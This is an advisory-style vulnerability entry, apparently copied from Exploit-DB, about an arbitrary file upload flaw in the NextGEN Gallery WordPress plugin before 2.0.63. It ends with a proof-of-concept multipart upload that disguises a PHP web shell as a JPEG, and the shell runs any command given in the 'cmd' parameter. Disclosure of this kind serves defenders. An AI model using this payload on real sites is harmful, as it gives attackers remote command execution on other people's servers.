NextGEN Gallery Plugin Arbitrary File Upload Vulnerability

vendor:

NextGEN Gallery

by:

SecurityFocus

9,3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: NextGEN Gallery

Affected Version From: Prior to 2.0.63

Affected Version To: 2.0.63

Patch Exists: YES

Related CWE: N/A

CPE: a:photocrati:nextgen_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

NextGEN Gallery Plugin Arbitrary File Upload Vulnerability

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Mitigation:

Upgrade to version 2.0.63 or later.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/68414/info

The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Versions prior to NextGEN Gallery 2.0.63 are vulnerable. 

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
  system($_GET['cmd']);
  }
?>
</pre>
</BODY></HTML>